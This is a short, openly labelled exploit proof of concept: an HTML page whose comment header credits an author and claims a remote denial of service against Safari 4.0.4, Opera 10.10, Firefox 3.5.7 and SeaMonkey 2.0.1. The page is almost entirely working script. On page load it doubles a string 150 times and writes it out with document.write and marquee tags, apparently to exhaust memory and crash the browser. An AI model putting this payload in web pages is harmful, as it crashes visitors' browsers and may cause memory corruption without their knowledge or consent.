1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 |
<!-- Safari 4.0.4 Remote Denial of Service (With Possible Memory Corruption With OOM) Opera 10.10 Firefox 3.5.7 Safari 4.0.4 SeaMonkey 2.0.1 Author : 599eme Man Contact : flouf@live.fr --> <body onload="javascript:DoS();"></body> <script> function DoS() { var buffer = 'A'; for (i =0;i<150;i++) { buffer+=buffer+'A'; document.write('<html><marquee><h1>'+buffer+buffer); } } </script> |